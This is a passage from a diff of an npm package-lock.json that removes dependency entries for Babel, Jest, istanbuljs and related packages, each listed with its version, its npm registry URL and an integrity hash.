"sha512-KpNARQA3Iwv+jTA0utUVVbrh+Jlrr1Fv0e56GGzAFOXN7dk/FviaDW8LHmK52DlcH4WP2n6gI8vN1aesBFgo9w==", - "dev": true, - "requires": { - "yallist": "^3.0.2" - } - }, - "yallist": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-3.1.1.tgz", - "integrity": "sha512-a4UGQaWPH59mOXUYnAG2ewncQS4i4F43Tv3JoAM+s2VDAmS9NsK8GpDMLrCHPksFT7h3K6TOoUNn2pb7RoXx4g==", - "dev": true - } - } - }, - "@babel/helper-module-imports": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-module-imports/-/helper-module-imports-7.25.9.tgz", - "integrity": "sha512-tnUA4RsrmflIM6W6RFTLFSXITtl0wKjgpnLgXyowocVPrbYrLUXSBXDgTs8BlbmIzIdlBySRQjINYs2BAkiLtw==", - "dev": true, - "requires": { - "@babel/traverse": "^7.25.9", - "@babel/types": "^7.25.9" - } - }, - "@babel/helper-module-transforms": { - "version": "7.26.0", - "resolved": "https://registry.npmjs.org/@babel/helper-module-transforms/-/helper-module-transforms-7.26.0.tgz", - "integrity": "sha512-xO+xu6B5K2czEnQye6BHA7DolFFmS3LB7stHZFaOLb1pAwO1HWLS8fXA+eh0A2yIvltPVmx3eNNDBJA2SLHXFw==", - "dev": true, - "requires": { - "@babel/helper-module-imports": "^7.25.9", - "@babel/helper-validator-identifier": "^7.25.9", - "@babel/traverse": "^7.25.9" - } - }, - "@babel/helper-plugin-utils": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-plugin-utils/-/helper-plugin-utils-7.25.9.tgz", - "integrity": "sha512-kSMlyUVdWe25rEsRGviIgOWnoT/nfABVWlqt9N19/dIPWViAOW2s9wznP5tURbs/IDuNk4gPy3YdYRgH3uxhBw==", - "dev": true - }, - "@babel/helper-string-parser": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-string-parser/-/helper-string-parser-7.25.9.tgz", - "integrity": "sha512-4A/SCr/2KLd5jrtOMFzaKjVtAei3+2r/NChoBNoZ3EyP/+GlhoaEGoWOZUmFmoITP7zOJyHIMm+DYRd8o3PvHA==", - "dev": true - }, - "@babel/helper-validator-identifier": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.25.9.tgz", - "integrity": "sha512-Ed61U6XJc3CVRfkERJWDz4dJwKe7iLmmJsbOGu9wSloNSFttHV0I8g6UAgb7qnK5ly5bGLPd4oXZlxCdANBOWQ==", - "dev": true - }, - "@babel/helper-validator-option": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-option/-/helper-validator-option-7.25.9.tgz", - "integrity": "sha512-e/zv1co8pp55dNdEcCynfj9X7nyUKUXoUEwfXqaZt0omVOmDe9oOTdKStH4GmAw6zxMFs50ZayuMfHDKlO7Tfw==", - "dev": true - }, - "@babel/helpers": { - "version": "7.26.10", - "resolved": "https://registry.npmjs.org/@babel/helpers/-/helpers-7.26.10.tgz", - "integrity": "sha512-UPYc3SauzZ3JGgj87GgZ89JVdC5dj0AoetR5Bw6wj4niittNyFh6+eOGonYvJ1ao6B8lEa3Q3klS7ADZ53bc5g==", - "dev": true, - "requires": { - "@babel/template": "^7.26.9", - "@babel/types": "^7.26.10" - } - }, - "@babel/parser": { - "version": "7.26.10", - "resolved": "https://registry.npmjs.org/@babel/parser/-/parser-7.26.10.tgz", - "integrity": "sha512-6aQR2zGE/QFi8JpDLjUZEPYOs7+mhKXm86VaKFiLP35JQwQb6bwUE+XbvkH0EptsYhbNBSUGaUBLKqxH1xSgsA==", - "dev": true, - "requires": { - "@babel/types": "^7.26.10" - } - }, - "@babel/plugin-syntax-async-generators": { - "version": "7.8.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-async-generators/-/plugin-syntax-async-generators-7.8.4.tgz", - "integrity": "sha512-tycmZxkGfZaxhMRbXlPXuVFpdWlXpir2W4AMhSJgRKzk/eDlIXOhb2LHWoLpDF7TEHylV5zNhykX6KAgHJmTNw==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-bigint": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-bigint/-/plugin-syntax-bigint-7.8.3.tgz", - "integrity": "sha512-wnTnFlG+YxQm3vDxpGE57Pj0srRU4sHE/mDkt1qv2YJJSeUAec2ma4WLUnUPeKjyrfntVwe/N6dCXpU+zL3Npg==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-class-properties": { - "version": "7.12.13", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-class-properties/-/plugin-syntax-class-properties-7.12.13.tgz", - "integrity": "sha512-fm4idjKla0YahUNgFNLCB0qySdsoPiZP3iQE3rky0mBUtMZ23yDJ9SJdg6dXTSDnulOVqiF3Hgr9nbXvXTQZYA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.12.13" - } - }, - "@babel/plugin-syntax-class-static-block": { - "version": "7.14.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-class-static-block/-/plugin-syntax-class-static-block-7.14.5.tgz", - "integrity": "sha512-b+YyPmr6ldyNnM6sqYeMWE+bgJcJpO6yS4QD7ymxgH34GBPNDM/THBh8iunyvKIZztiwLH4CJZ0RxTk9emgpjw==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.14.5" - } - }, - "@babel/plugin-syntax-import-attributes": { - "version": "7.26.0", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-import-attributes/-/plugin-syntax-import-attributes-7.26.0.tgz", - "integrity": "sha512-e2dttdsJ1ZTpi3B9UYGLw41hifAubg19AtCu/2I/F1QNVclOBr1dYpTdmdyZ84Xiz43BS/tCUkMAZNLv12Pi+A==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.25.9" - } - }, - "@babel/plugin-syntax-import-meta": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-import-meta/-/plugin-syntax-import-meta-7.10.4.tgz", - "integrity": "sha512-Yqfm+XDx0+Prh3VSeEQCPU81yC+JWZ2pDPFSS4ZdpfZhp4MkFMaDC1UqseovEKwSUpnIL7+vK+Clp7bfh0iD7g==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.10.4" - } - }, - "@babel/plugin-syntax-json-strings": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-json-strings/-/plugin-syntax-json-strings-7.8.3.tgz", - "integrity": "sha512-lY6kdGpWHvjoe2vk4WrAapEuBR69EMxZl+RoGRhrFGNYVK8mOPAW8VfbT/ZgrFbXlDNiiaxQnAtgVCZ6jv30EA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-jsx": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-jsx/-/plugin-syntax-jsx-7.25.9.tgz", - "integrity": "sha512-ld6oezHQMZsZfp6pWtbjaNDF2tiiCYYDqQszHt5VV437lewP9aSi2Of99CK0D0XB21k7FLgnLcmQKyKzynfeAA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.25.9" - } - }, - "@babel/plugin-syntax-logical-assignment-operators": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-logical-assignment-operators/-/plugin-syntax-logical-assignment-operators-7.10.4.tgz", - "integrity": "sha512-d8waShlpFDinQ5MtvGU9xDAOzKH47+FFoney2baFIoMr952hKOLp1HR7VszoZvOsV/4+RRszNY7D17ba0te0ig==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.10.4" - } - }, - "@babel/plugin-syntax-nullish-coalescing-operator": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-nullish-coalescing-operator/-/plugin-syntax-nullish-coalescing-operator-7.8.3.tgz", - "integrity": "sha512-aSff4zPII1u2QD7y+F8oDsz19ew4IGEJg9SVW+bqwpwtfFleiQDMdzA/R+UlWDzfnHFCxxleFT0PMIrR36XLNQ==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-numeric-separator": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-numeric-separator/-/plugin-syntax-numeric-separator-7.10.4.tgz", - "integrity": "sha512-9H6YdfkcK/uOnY/K7/aA2xpzaAgkQn37yzWUMRK7OaPOqOpGS1+n0H5hxT9AUw9EsSjPW8SVyMJwYRtWs3X3ug==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.10.4" - } - }, - "@babel/plugin-syntax-object-rest-spread": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-object-rest-spread/-/plugin-syntax-object-rest-spread-7.8.3.tgz", - "integrity": "sha512-XoqMijGZb9y3y2XskN+P1wUGiVwWZ5JmoDRwx5+3GmEplNyVM2s2Dg8ILFQm8rWM48orGy5YpI5Bl8U1y7ydlA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-optional-catch-binding": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-catch-binding/-/plugin-syntax-optional-catch-binding-7.8.3.tgz", - "integrity": "sha512-6VPD0Pc1lpTqw0aKoeRTMiB+kWhAoT24PA+ksWSBrFtl5SIRVpZlwN3NNPQjehA2E/91FV3RjLWoVTglWcSV3Q==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-optional-chaining": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-chaining/-/plugin-syntax-optional-chaining-7.8.3.tgz", - "integrity": "sha512-KoK9ErH1MBlCPxV0VANkXW2/dw4vlbGDrFgz8bmUsBGYkFRcbRwMh6cIJubdPrkxRwuGdtCk0v/wPTKbQgBjkg==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-private-property-in-object": { - "version": "7.14.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-private-property-in-object/-/plugin-syntax-private-property-in-object-7.14.5.tgz", - "integrity": "sha512-0wVnp9dxJ72ZUJDV27ZfbSj6iHLoytYZmh3rFcxNnvsJF3ktkzLDZPy/mA17HGsaQT3/DQsWYX1f1QGWkCoVUg==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.14.5" - } - }, - "@babel/plugin-syntax-top-level-await": { - "version": "7.14.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-top-level-await/-/plugin-syntax-top-level-await-7.14.5.tgz", - "integrity": "sha512-hx++upLv5U1rgYfwe1xBQUhRmU41NEvpUvrp8jkrSCdvGSnM5/qdRMtylJ6PG5OFkBaHkbTAKTnd3/YyESRHFw==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.14.5" - } - }, - "@babel/plugin-syntax-typescript": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-typescript/-/plugin-syntax-typescript-7.25.9.tgz", - "integrity": "sha512-hjMgRy5hb8uJJjUcdWunWVcoi9bGpJp8p5Ol1229PoN6aytsLwNMgmdftO23wnCLMfVmTwZDWMPNq/D1SY60JQ==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.25.9" - } - }, - "@babel/template": { - "version": "7.26.9", - "resolved": "https://registry.npmjs.org/@babel/template/-/template-7.26.9.tgz", - "integrity": "sha512-qyRplbeIpNZhmzOysF/wFMuP9sctmh2cFzRAZOn1YapxBsE1i9bJIY586R/WBLfLcmcBlM8ROBiQURnnNy+zfA==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.26.2", - "@babel/parser": "^7.26.9", - "@babel/types": "^7.26.9" - } - }, - "@babel/traverse": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/traverse/-/traverse-7.25.9.tgz", - "integrity": "sha512-ZCuvfwOwlz/bawvAuvcj8rrithP2/N55Tzz342AkTvq4qaWbGfmCk/tKhNaV2cthijKrPAA8SRJV5WWe7IBMJw==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.25.9", - "@babel/generator": "^7.25.9", - "@babel/parser": "^7.25.9", - "@babel/template": "^7.25.9", - "@babel/types": "^7.25.9", - "debug": "^4.3.1", - "globals": "^11.1.0" - } - }, - "@babel/types": { - "version": "7.26.10", - "resolved": "https://registry.npmjs.org/@babel/types/-/types-7.26.10.tgz", - "integrity": "sha512-emqcG3vHrpxUKTrxcblR36dcrcoRDvKmnL/dCL6ZsHaShW80qxCAcNhzQZrpeM765VzEos+xOi4s+r4IXzTwdQ==", - "dev": true, - "requires": { - "@babel/helper-string-parser": "^7.25.9", - "@babel/helper-validator-identifier": "^7.25.9" - } - }, - "@bcoe/v8-coverage": { - "version": "0.2.3", - "resolved": "https://registry.npmjs.org/@bcoe/v8-coverage/-/v8-coverage-0.2.3.tgz", - "integrity": "sha512-0hYQ8SB4Db5zvZB4axdMHGwEaQjkZzFjQiN9LVYvIFB2nSUHW9tYpxWriPrWDASIxiaXax83REcLxuSdnGPZtw==", - "dev": true - }, - "@isaacs/cliui": { - "version": "8.0.2", - "resolved": "https://registry.npmjs.org/@isaacs/cliui/-/cliui-8.0.2.tgz", - "integrity": "sha512-O8jcjabXaleOG9DQ0+ARXWZBTfnP4WNAqzuiJK7ll44AmxGKv/J2M4TPjxjY3znBCfvBXFzucm1twdyFybFqEA==", - "requires": { - "string-width": "^5.1.2", - "string-width-cjs": "npm:string-width@^4.2.0", - "strip-ansi": "^7.0.1", - "strip-ansi-cjs": "npm:strip-ansi@^6.0.1", - "wrap-ansi": "^8.1.0", - "wrap-ansi-cjs": "npm:wrap-ansi@^7.0.0" - }, - "dependencies": { - "ansi-regex": { - "version": "6.1.0", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-6.1.0.tgz", - "integrity": "sha512-7HSX4QQb4CspciLpVFwyRe79O3xsIZDDLER21kERQ71oaPodF8jL725AgJMFAYbooIqolJoRLuM81SpeUkpkvA==" - }, - "ansi-styles": { - "version": "6.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-6.2.1.tgz", - "integrity": "sha512-bN798gFfQX+viw3R7yrGWRqnrN2oRkEkUjjl4JNn4E8GxxbjtG3FbrEIIY3l8/hrwUwIeCZvi4QuOTP4MErVug==" - }, - "emoji-regex": { - "version": "9.2.2", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-9.2.2.tgz", - "integrity": "sha512-L18DaJsXSUk2+42pv8mLs5jJT2hqFkFE4j21wOmgbUqsZ2hL72NsUU785g9RXgo3s0ZNgVl42TiHp3ZtOv/Vyg==" - }, - "string-width": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-5.1.2.tgz", - "integrity": "sha512-HnLOCR3vjcY8beoNLtcjZ5/nxn2afmME6lhrDrebokqMap+XbeW8n9TXpPDOqdGK5qcI3oT0GKTW6wC7EMiVqA==", - "requires": { - "eastasianwidth": "^0.2.0", - "emoji-regex": "^9.2.2", - "strip-ansi": "^7.0.1" - } - }, - "strip-ansi": { - "version": "7.1.0", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-7.1.0.tgz", - "integrity": "sha512-iq6eVVI64nQQTRYq2KtEg2d2uU7LElhTJwsH4YzIHZshxlgZms/wIc4VoDQTlG/IvVIrBKG06CrZnp0qv7hkcQ==", - "requires": { - "ansi-regex": "^6.0.1" - } - }, - "wrap-ansi": { - "version": "8.1.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-8.1.0.tgz", - "integrity": "sha512-si7QWI6zUMq56bESFvagtmzMdGOtoxfR+Sez11Mobfc7tm+VkUckk9bW2UeffTGVUbOksxmSw0AA2gs8g71NCQ==", - "requires": { - "ansi-styles": "^6.1.0", - "string-width": "^5.0.1", - "strip-ansi": "^7.0.1" - } - } - } - }, - "@isaacs/fs-minipass": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/@isaacs/fs-minipass/-/fs-minipass-4.0.1.tgz", - "integrity": "sha512-wgm9Ehl2jpeqP3zw/7mo3kRHFp5MEDhqAdwy1fTGkHAwnkGOVsgpvQhL8B5n1qlb01jV3n/bI0ZfZp5lWA1k4w==", - "requires": { - "minipass": "^7.0.4" - } - }, - "@istanbuljs/load-nyc-config": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/@istanbuljs/load-nyc-config/-/load-nyc-config-1.1.0.tgz", - "integrity": "sha512-VjeHSlIzpv/NyD3N0YuHfXOPDIixcA1q2ZV98wsMqcYlPmv2n3Yb2lYP9XMElnaFVXg5A7YLTeLu6V84uQDjmQ==", - "dev": true, - "requires": { - "camelcase": "^5.3.1", - "find-up": "^4.1.0", - "get-package-type": "^0.1.0", - "js-yaml": "^3.13.1", - "resolve-from": "^5.0.0" - }, - "dependencies": { - "argparse": { - "version": "1.0.10", - "resolved": "https://registry.npmjs.org/argparse/-/argparse-1.0.10.tgz", - "integrity": "sha512-o5Roy6tNG4SL/FOkCAN6RzjiakZS25RLYFrcMttJqbdd8BWrnA+fGz57iN5Pb06pvBGvl5gQ0B48dJlslXvoTg==", - "dev": true, - "requires": { - "sprintf-js": "~1.0.2" - } - }, - "js-yaml": { - "version": "3.14.1", - "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-3.14.1.tgz", - "integrity": "sha512-okMH7OXXJ7YrN9Ok3/SXrnu4iX9yOk+25nqX4imS2npuvTYDmo/QEZoqwZkYaIDk3jVvBOTOIEgEhaLOynBS9g==", - "dev": true, - "requires": { - "argparse": "^1.0.7", - "esprima": "^4.0.0" - } - } - } - }, - "@istanbuljs/schema": { - "version": "0.1.3", - "resolved": "https://registry.npmjs.org/@istanbuljs/schema/-/schema-0.1.3.tgz", - "integrity": "sha512-ZXRY4jNvVgSVQ8DL3LTcakaAtXwTVUxE81hslsyD2AtoXW/wVob10HkOJ1X/pAlcI7D+2YoZKg5do8G/w6RYgA==", - "dev": true - }, - "@jest/console": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/console/-/console-29.7.0.tgz", - "integrity": "sha512-5Ni4CU7XHQi32IJ398EEP4RrB8eV09sXP2ROqD4bksHrnTree52PsxvX8tpL8LvTZ3pFzXyPbNQReSN41CAhOg==", - "dev": true, - "requires": { - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "jest-message-util": "^29.7.0", - "jest-util": "^29.7.0", - "slash": "^3.0.0" - } - }, - "@jest/core": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/core/-/core-29.7.0.tgz", - "integrity": "sha512-n7aeXWKMnGtDA48y8TLWJPJmLmmZ642Ceo78cYWEpiD7FzDgmNDV/GCVRorPABdXLJZ/9wzzgZAlHjXjxDHGsg==", - "dev": true, - "requires": { - "@jest/console": "^29.7.0", - "@jest/reporters": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "jest-changed-files": "^29.7.0", - "jest-config": "^29.7.0", - "jest-haste-map": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-regex-util": "^29.6.3", - "jest-resolve": "^29.7.0", - "jest-resolve-dependencies": "^29.7.0", - "jest-runner": "^29.7.0", - "jest-runtime": "^29.7.0", - "jest-snapshot": "^29.7.0", - "jest-util": "^29.7.0", - "jest-validate": "^29.7.0", - "jest-watcher": "^29.7.0", - "micromatch": "^4.0.4", - "pretty-format": "^29.7.0", - "slash": "^3.0.0", - "strip-ansi": "^6.0.0" - } - }, - "@jest/environment": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/environment/-/environment-29.7.0.tgz", - "integrity": "sha512-aQIfHDq33ExsN4jP1NWGXhxgQ/wixs60gDiKO+XVMd8Mn0NWPWgc34ZQDTb2jKaUWQ7MuwoitXAsN2XVXNMpAw==", - "dev": true, - "requires": { - "@jest/fake-timers": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "jest-mock": "^29.7.0" - } - }, - "@jest/expect": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/expect/-/expect-29.7.0.tgz", - "integrity": "sha512-8uMeAMycttpva3P1lBHB8VciS9V0XAr3GymPpipdyQXbBcuhkLQOSe8E/p92RyAdToS6ZD1tFkX+CkhoECE0dQ==", - "dev": true, - "requires": { - "expect": "^29.7.0", - "jest-snapshot": "^29.7.0" - } - }, - "@jest/expect-utils": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/expect-utils/-/expect-utils-29.7.0.tgz", - "integrity": "sha512-GlsNBWiFQFCVi9QVSx7f5AgMeLxe9YCCs5PuP2O2LdjDAA8Jh9eX7lA1Jq/xdXw3Wb3hyvlFNfZIfcRetSzYcA==", - "dev": true, - "requires": { - "jest-get-type": "^29.6.3" - } - }, - "@jest/fake-timers": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/fake-timers/-/fake-timers-29.7.0.tgz", - "integrity": "sha512-q4DH1Ha4TTFPdxLsqDXK1d3+ioSL7yL5oCMJZgDYm6i+6CygW5E5xVr/D1HdsGxjt1ZWSfUAs9OxSB/BNelWrQ==", - "dev": true, - "requires": { - "@jest/types": "^29.6.3", - "@sinonjs/fake-timers": "^10.0.2", - "@types/node": "*", - "jest-message-util": "^29.7.0", - "jest-mock": "^29.7.0", - "jest-util": "^29.7.0" - } - }, - "@jest/globals": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/globals/-/globals-29.7.0.tgz", - "integrity": "sha512-mpiz3dutLbkW2MNFubUGUEVLkTGiqW6yLVTA+JbP6fI6J5iL9Y0Nlg8k95pcF8ctKwCS7WVxteBs29hhfAotzQ==", - "dev": true, - "requires": { - "@jest/environment": "^29.7.0", - "@jest/expect": "^29.7.0", - "@jest/types": "^29.6.3", - "jest-mock": "^29.7.0" - } - }, - "@jest/reporters": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/reporters/-/reporters-29.7.0.tgz", - "integrity": "sha512-DApq0KJbJOEzAFYjHADNNxAE3KbhxQB1y5Kplb5Waqw6zVbuWatSnMjE5gs8FUgEPmNsnZA3NCWl9NG0ia04Pg==", - "dev": true, - "requires": { - "@bcoe/v8-coverage": "^0.2.3", - "@jest/console": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "@jridgewell/trace-mapping": "^0.3.18", - "@types/node": "*", - "chalk": "^4.0.0", - "collect-v8-coverage": "^1.0.0", - "exit": "^0.1.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "istanbul-lib-coverage": "^3.0.0", - "istanbul-lib-instrument": "^6.0.0", - "istanbul-lib-report": "^3.0.0", - "istanbul-lib-source-maps": "^4.0.0", - "istanbul-reports": "^3.1.3", - "jest-message-util": "^29.7.0", - "jest-util": "^29.7.0", - "jest-worker": "^29.7.0", - "slash": "^3.0.0", - "string-length": "^4.0.1", - "strip-ansi": "^6.0.0", - "v8-to-istanbul": "^9.0.1" - } - }, - "@jest/schemas": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/@jest/schemas/-/schemas-29.6.3.tgz", - "integrity": "sha512-mo5j5X+jIZmJQveBKeS/clAueipV7KgiX1vMgCxam1RNYiqE1w62n0/tJJnHtjW8ZHcQco5gY85jA3mi0L+nSA==", - "dev": true, - "requires": { - "@sinclair/typebox": "^0.27.8" - } - }, - "@jest/source-map": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/@jest/source-map/-/source-map-29.6.3.tgz", - "integrity": "sha512-MHjT95QuipcPrpLM+8JMSzFx6eHp5Bm+4XeFDJlwsvVBjmKNiIAvasGK2fxz2WbGRlnvqehFbh07MMa7n3YJnw==", - "dev": true, - "requires": { - "@jridgewell/trace-mapping": "^0.3.18", - "callsites": "^3.0.0", - "graceful-fs": "^4.2.9" - } - }, - "@jest/test-result": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/test-result/-/test-result-29.7.0.tgz", - "integrity": "sha512-Fdx+tv6x1zlkJPcWXmMDAG2HBnaR9XPSd5aDWQVsfrZmLVT3lU1cwyxLgRmXR9yrq4NBoEm9BMsfgFzTQAbJYA==", - "dev": true, - "requires": { - "@jest/console": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/istanbul-lib-coverage": "^2.0.0", - "collect-v8-coverage": "^1.0.0" - } - }, - "@jest/test-sequencer": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/test-sequencer/-/test-sequencer-29.7.0.tgz", - "integrity": "sha512-GQwJ5WZVrKnOJuiYiAF52UNUJXgTZx1NHjFSEB0qEMmSZKAkdMoIzw/Cj6x6NF4AvV23AUqDpFzQkN/eYCYTxw==", - "dev": true, - "requires": { - "@jest/test-result": "^29.7.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.7.0", - "slash": "^3.0.0" - } - }, - "@jest/transform": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/transform/-/transform-29.7.0.tgz", - "integrity": "sha512-ok/BTPFzFKVMwO5eOHRrvnBVHdRy9IrsrW1GpMaQ9MCnilNLXQKmAX8s1YXDFaai9xJpac2ySzV0YeRRECr2Vw==", - "dev": true, - "requires": { - "@babel/core": "^7.11.6", - "@jest/types": "^29.6.3", - "@jridgewell/trace-mapping": "^0.3.18", - "babel-plugin-istanbul": "^6.1.1", - "chalk": "^4.0.0", - "convert-source-map": "^2.0.0", - "fast-json-stable-stringify": "^2.1.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.7.0", - "jest-regex-util": "^29.6.3", - "jest-util": "^29.7.0", - "micromatch": "^4.0.4", - "pirates": "^4.0.4", - "slash": "^3.0.0", - "write-file-atomic": "^4.0.2" - } - }, - "@jest/types": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/@jest/types/-/types-29.6.3.tgz", - "integrity": "sha512-u3UPsIilWKOM3F9CXtrG8LEJmNxwoCQC/XVj4IKYXvvpx7QIi/Kg1LI5uDmDpKlac62NUtX7eLjRh+jVZcLOzw==", - "dev": true, - "requires": { - "@jest/schemas": "^29.6.3", - "@types/istanbul-lib-coverage": "^2.0.0", - "@types/istanbul-reports": "^3.0.0", - "@types/node": "*", - "@types/yargs": "^17.0.8", - "chalk": "^4.0.0" - } - }, - "@jridgewell/gen-mapping": { - "version": "0.3.5", - "resolved": "https://registry.npmjs.org/@jridgewell/gen-mapping/-/gen-mapping-0.3.5.tgz", - "integrity": "sha512-IzL8ZoEDIBRWEzlCcRhOaCupYyN5gdIK+Q6fbFdPDg6HqX6jpkItn7DFIpW9LQzXG6Df9sA7+OKnq0qlz/GaQg==", - "dev": true, - "requires": { - "@jridgewell/set-array": "^1.2.1", - "@jridgewell/sourcemap-codec": "^1.4.10", - "@jridgewell/trace-mapping": "^0.3.24" - } - }, - "@jridgewell/resolve-uri": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/@jridgewell/resolve-uri/-/resolve-uri-3.1.0.tgz", - "integrity": "sha512-F2msla3tad+Mfht5cJq7LSXcdudKTWCVYUgw6pLFOOHSTtZlj6SWNYAp+AhuqLmWdBO2X5hPrLcu8cVP8fy28w==", - "dev": true - }, - "@jridgewell/set-array": { - "version": "1.2.1", - "resolved": "https://registry.npmjs.org/@jridgewell/set-array/-/set-array-1.2.1.tgz", - "integrity": "sha512-R8gLRTZeyp03ymzP/6Lil/28tGeGEzhx1q2k703KGWRAI1VdvPIXdG70VJc2pAMw3NA6JKL5hhFu1sJX0Mnn/A==", - "dev": true - }, - "@jridgewell/sourcemap-codec": { - "version": "1.4.14", - "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.4.14.tgz", - "integrity": "sha512-XPSJHWmi394fuUuzDnGz1wiKqWfo1yXecHQMRf2l6hztTO+nPru658AyDngaBe7isIxEkRsPR3FZh+s7iVa4Uw==", - "dev": true - }, - "@jridgewell/trace-mapping": { - "version": "0.3.25", - "resolved": "https://registry.npmjs.org/@jridgewell/trace-mapping/-/trace-mapping-0.3.25.tgz", - "integrity": "sha512-vNk6aEwybGtawWmy/PzwnGDOjCkLWSD2wqvjGGAgOAwCGWySYXfYoxt00IJkTF+8Lb57DwOb3Aa0o9CApepiYQ==", - "dev": true, - "requires": { - "@jridgewell/resolve-uri": "^3.1.0", - "@jridgewell/sourcemap-codec": "^1.4.14" - } - }, - "@jsep-plugin/assignment": { - "version": "1.3.0", - "resolved": "https://registry.npmjs.org/@jsep-plugin/assignment/-/assignment-1.3.0.tgz", - "integrity": "sha512-VVgV+CXrhbMI3aSusQyclHkenWSAm95WaiKrMxRFam3JSUiIaQjoMIw2sEs/OX4XifnqeQUN4DYbJjlA8EfktQ==", - "requires": {} - }, - "@jsep-plugin/regex": { - "version": "1.0.4", - "resolved": "https://registry.npmjs.org/@jsep-plugin/regex/-/regex-1.0.4.tgz", - "integrity": "sha512-q7qL4Mgjs1vByCaTnDFcBnV9HS7GVPJX5vyVoCgZHNSC9rjwIlmbXG5sUuorR5ndfHAIlJ8pVStxvjXHbNvtUg==", - "requires": {} - 